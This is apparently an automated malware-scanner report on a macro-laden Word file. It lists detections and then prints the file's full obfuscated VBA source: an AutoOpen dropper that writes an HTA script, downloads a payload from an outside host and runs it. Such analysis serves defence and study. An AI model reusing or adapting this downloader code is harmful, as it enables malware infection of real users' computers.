MALICIOUS (risk score: 172)

Heuristics (7)

- ClamAV: Doc.Dropper.Generic-9823794-0 [critical] (CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Dropper.Generic-9823794-0
- VBA project inside OOXML [medium, 3 related findings] (OOXML_VBA)
  Document contains a VBA project (VBA macros present).
- CreateObject call [high] (OLE_VBA_CREATEOBJ)
  Matched line in script: Set aVPfe = CreateObject(amaLIb("e" & "gas" & "sem.odc"))
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
  Matched line in script: Sub AutoOpen()
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9214 bytes |

SHA-256: c950c4d50c2d43f0408f22029916a94613f97b5e610b40db0737f4f71b9f8a39
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 4 long base64-like blob(s)).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aeNB8"
Sub AutoOpen()
aaFNS
End Sub
Attribute VB_Name = "axQF7"
Sub aIpit(az1plX, a3Pxs)
' Herself infirmity forgot achieves governing
' Rook trends curvature madrid alleged
' Slowly
' Assail basque things
' Swindle subtle column negotiation
' Truck ipod
' Forthright meager consoles
' Uzbekistan directors regression
' Sloop reflects females links
' Prolixity tier standard controversial abase
' Nat scrawl conventional relevant
' Tions effeminate ephemeral
' Buffer mohawk smoldering awkwardness gpl plaza
' Himalayas titan introduces
' Curve temporarily latticed twenty-eighth
' Lorenz
' Databases craters bulgarian offering
' Precipitation consummation
' Stickers
' Stanley forsook
' Tasmania
' Algeria specializing petersburg mace citron
End Sub
Attribute VB_Name = "aneD8"
Public Const aOBZCw As String = "21232f297a57a5a743894a0e4a801fc3"
Public Const aWiEfe As String = "utf-8"
Function amaLIb(aV6qE)
' Accepting distant
' Town
' Rubble canadian glasses rx
' Cal stepmother released improved
' Roller halifax driver lighting
' Girl wight ronald
' Damn solvent sedge
' Here hk chat chicken
a28IaQ = 1
arnIy0 = Len(aV6qE)
al3Hi = ""
For a4SWJZ = 1 To arnIy0
' Colossus obligatory
' Pod disintegration cunt pascal introducing
' Wav vishnu
al3Hi = Mid(aV6qE, a4SWJZ, 1) & al3Hi
' Levitra vantage reel
' Salad bruno
' Democrat superfluity papers
' Infection submitting
' Sponsored trolley paolo athlete inch
' Surgeons local abu
' Lt emacs
' Planes heater
Next a4SWJZ
' Tighten halifax cranium
' Nationwide player recession
' Samaria capriciously
' Tile dana versification
' Disciplined href bewitched edwards
' Rep advances
' Fu
' Detrimental bungalow rivulet picnic afterthought
' Appointed folder
' Factory choleric
' Pickaxe
amaLIb = al3Hi
End Function
Function auZIzw(aeDyc)
Set aVPfe = CreateObject(amaLIb("e" & "gas" & "sem.odc"))
With aVPfe.BodyPart
.ContentTransferEncoding = amaLIb("46e" & "sab")
With .GetEncodedContentStream
.WriteText aeDyc
.Flush
End With
With .GetDecodedContentStream
.Charset = aWiEfe
auZIzw = .ReadText
End With
End With
' Rationally
' Sake combatant dish unavoidable duration
' Argumentative alliance
' Jubilant jewish layout
End Function
Sub a6pB2w(aBVS6, arm9Ot)
' Simplified
' Exterminate reflex sully
' Burgher gc infectious indiscreet through honor
' Pres pa ryan tattoo
' Novel subterfuge
' Undefiled detest
' Bewitched saturated le
' Mu collected cropped indelicate exalt
' Inflame hits waitress parenthesis
' Dynamo ignominious
' Incompatible
Open aBVS6 For Output As #1
Print #1, arm9Ot
Close #1
End Sub
Function Des(aVDNWp, azbCc, apL8MF)
' Allison dissemble
' Fax highlander reunion loins
' Abs indelicate suzerainty
' Monologue wine cost
Des = Replace(auZIzw(aVDNWp), azbCc, apL8MF)
End Function
Sub aaFNS()
alcfk = Des("Y2ExOWdIbTphMTlnSG1cYTE5Z0htd2ExOWdIbWlhMTlnSG1uYTE5Z0htZGExOWdIbW9hMTlnSG13YTE5Z0htc2ExOWdIbVxhMTlnSG1zYTE5Z0hteWExOWdIbXNhMTlnSG10YTE5Z0htZWExOWdIbW1hMTlnSG0zYTE5Z0htMmExOWdIbVxhMTlnSG1tYTE5Z0htc2ExOWdIbWhhMTlnSG10YTE5Z0htYWExOWdIbS5hMTlnSG1lYTE5Z0hteGExOWdIbWVhMTlnSG0=", "a19gHm", "")
aQfqs = Des("Y2FOOVVTSTphTjlVU0lcYU45VVNJdWFOOVVTSXNhTjlVU0llYU45VVNJcmFOOVVTSXNhTjlVU0lcYU45VVNJcGFOOVVTSXVhTjlVU0liYU45VVNJbGFOOVVTSWlhTjlVU0ljYU45VVNJXGFOOVVTSXBhTjlVU0l1YU45VVNJYmFOOVVTSWxhTjlVU0lpYU45VVNJY2FOOVVTSS5hTjlVU0ljYU45VVNJb2FOOVVTSW1hTjlVU0k=", "aN9USI", "")
aVABHZ = Des("Y2F1OFpKOmF1OFpKXGF1OFpKdWF1OFpKc2F1OFpKZWF1OFpKcmF1OFpKc2F1OFpKXGF1OFpKcGF1OFpKdWF1OFpKYmF1OFpKbGF1OFpKaWF1OFpKY2F1OFpKXGF1OFpKaWF1OFpKbmF1OFpKZGF1OFpKZWF1OFpKeGF1OFpKLmF1OFpKaGF1OFpKdGF1OFpKYWF1OFpK", "au8ZJ", "")
akGyJ = Des("cmE4dDZGdWE4dDZGbmE4dDZGZGE4dDZGbGE4dDZGbGE4dDZGM2E4dDZGMmE4dDZGLmE4dDZGZWE4dDZGeGE4dDZGZWE4dDZGIGE4dDZGdWE4dDZGcmE4dDZGbGE4dDZGLmE4dDZGZGE4dDZGbGE4dDZGbGE4dDZGLGE4dDZGT2E4dDZGcGE4dDZGZWE4dDZGbmE4dDZGVWE4dDZGUmE4dDZGTGE4dDZG", "a8t6F", "")
' Cider expanded validity thoroughly chrysalis
' Seekers
' Wellness gourd
' Z meanwhile
' Replacing passion seconds
' Knife landward melissa
' Transport
' Fda nocturnal engines
' Backwoods indemnification update urgency liberalism lawyer
' Connected
' Distilled
' Omelet
a7SdU = "KCIiKTsNCnZhciBhUnpoQyA9ICJjOlxccHJvZ3JhbWRhdGFcXGFIeHZVOS5wZGYiOw"
a54Nf = "VEajB4ID0gInItIEFnb2xhaUR3b2hTLCIuc3BsaXQoIiIpLnJldmVyc2UoKS5qb2lu"
' Candidacy widespread jordan
' Bespoke coax damnable repulsion ranks justin
' Liberty
' Swiss canister scholarly dismount skip
a8K5nk = "Jtdl93JkJPa09BPVlXelBEa1FMJnhPPUNPdlZOVk1KTCIsIGZhbHNlKTsNCmFqYnF0"
aokvC = "KTsNCnZhciBhamJxdCA9IG5ldyBBY3RpdmVYT2JqZWN0KCJtc3htbDIueG1saHR0cC"
aVhgw = "Y2xvc2UoKTsNCg0KPC9zY3JpcHQ+"
' Charlatan springs weighted fastidious clinton compounds
' Fetter casinos humanities
' Impact shunned seventy-seven discrete sophisticated
aHvSo = "VGhlbg0KCVNldCBhTmszeiA9IENyZWF0ZU9iamVjdCgiYWRvZGIuc3RyZWFtIikNCg"
aGDXK7 = "IpOw0KYWpicXQub3BlbigiR0VUIiwgImh0dHA6Ly9rZ2NhZGp1c3Q2LmNvbS9mb3J1"
' Having highs
' Spotless preferences
' Civic gauge
' Flail gauge french transcription
arHck = "thdFlQdWRdKGFENXVGICsgIjMyICIgKyBhUnpoQyArIGFlRGoweCk7DQp3aW5kb3cu"
alpDF = "ZXkxP2Z6PUpBQmlYV3J4bnRQaG4mcnJrbT1Cd1J4RVRaJlZqPXJvWmNkbVhXZ2VmUF"
aUrdeH = "Q1dkZWSnNzTnJLZUF2X0dXT3ZjNG9PNFl3V0tKcXBZVmFsbVAyalhYeVhFL2Zmc2xh"
' Banks miami nearest
' Citizenship feels
' Sambo licentiousness englishwoman possible partition sizes update
' Diamond kidnap graze
aHoGWs = "xvc2UNCkVuZCBJZg0KDQo8L3NjcmlwdD4NCg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2"
a9N4Ub = "B0Ij4NCg0KYUQ1dUYgPSAicnVuZGxsIg0KDQpJZiBhamJxdC5zdGF0dXMgPSAyMDAg"
aNmYdC = "ZXNwb25zZWJvZHkNCglhTmszei5TYXZlVG9GaWxlIGFSemhDLCAyDQoJYU5rM3ouQ2"
' California
' Packs mainstream unless adoring
' Butchers
' Assessing fx ix sideboard
akU1q = "lhTmszei5PcGVuDQoJYU5rM3ouVHlwZSA9IDENCglhTmszei5Xcml0ZSBhamJxdC5y"
' Combo rent
' Result somalia autocracy wallet mathematically
' Onion specify ot piston commune administrators
adzmx = "Vocy50cGlyY3N3Ii5zcGxpdCgiIikucmV2ZXJzZSgpLmpvaW4oIiIpOw0KdmFyIGF0"
' Made pinkerton dastardly
' Ornate unstable forestry spiritualism
' Boils privilege berber
' Movies se peacock royal
aVUEZb = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQoNCnZhciBhUWcxZCA9ICJsbG"
' Rigorous networking str ban belated
' Trials canary possibly remember
' Turbulence regards ding
akf6g = "LnNlbmQoKTsNCg0KPC9zY3JpcHQ+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9InZic2NyaX"
a90geX = "0KDQp3aW5kb3cucmVzaXplVG8oMSwgMSk7DQp3aW5kb3cubW92ZVRvKC0xMCwgLTEw"
' Servitor tournaments kazakhstan
' Poole
' Tacitly nitric
' Plaudits occupancy mate
aHJK5h = "bS92aWV3cG9zdC9PWmphRHJQR01yTHJsQTMwT2NiTU84VE1sVUZGaktaOVl3SWNsUW"
' Sambo responsibility touchstone
' Rank newfoundland cm annul
' Morale mussulman residential curd
' Brook magnanimously
avntS = "WVB1ZCA9ICJudXIiLnNwbGl0KCIiKS5yZXZlcnNlKCkuam9pbigiIik7DQp2YXIgYW"
' Colloquy
' Bahrain tamil
' Clipping chime
' Piston narrator muslim bbs
agtTW5 = "YXNjcmlwdCI+DQoNCnZhciBhcmt6RyA9IG5ldyBBY3RpdmVYT2JqZWN0KGFRZzFkKV"
arm9Ot = auZIzw(aVUEZb & adzmx & avntS & a54Nf & a7SdU & a90geX & aokvC & aGDXK7 & aHJK5h & aUrdeH & alpDF & a8K5nk & akf6g & a9N4Ub & aHvSo & akU1q & aNmYdC & aHoGWs & agtTW5 & arHck & aVhgw)
' Earl thorough bernard
' Yo outgrown petulant
' Cause thong memorabilia
a6pB2w aVABHZ, arm9Ot
' Networking
' Polynesia crater booth wisdom marred literacy
' Grandee robinson dui
' Bouquet senator script recipe
' Valley lie horror
' Fits pert lv problems cockade
' Gull waft wanting
' Ointment smarter theft plaything tracy ibm interrogation
' Jess zshops johnson neighbors
' Backgammon overdue
' Byzantine teams customise disk hash
' Emaciated ri magical
' Practical turkish
' Sorry stamps virtual
' Inadvertently
' Never contrition
' Velvet
' Held
' Ghz grades
' Gymnasium nm
' Butchers ravenously ecology a depravity dining
' Aw habitat
' Massive buffer accomplishes xerox funding
' Nutriment parochial nuts
' Phi
' Intuitive productive harmonize
' Letter
a6jPa = Des("d2FiZENCc2FiZENCY2FiZENCcmFiZENCaWFiZENCcGFiZENCdGFiZENCLmFiZENCc2FiZENCaGFiZENCZWFiZENCbGFiZENCbGFiZENC", "abdCB", "")
CreateObject(a6jPa).run (akGyJ & " " & aVABHZ)
End Sub
Attribute VB_Name = "aChxWo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function azVcvA(aapoVD)
' Racks hobby revenge heart brokers sb
' Deface bomb gymnasium
' Spiral au cardiac paralyze
' Universality misgivings limitations ave impropriety abstract missing
' Outlay thered
' Colony magnificently houses dod
' Src roseate confidante
' Blowing
' Reporter softball
' Lowest birthright
' Z legitimacy estate inversion finished
End Function
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 36864 bytes |

SHA-256: f92b6dd6f8d6fd08df0957fe80352798045cdf185e99cc9181c91f5f1eb5413b
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 4 long base64-like blob(s)).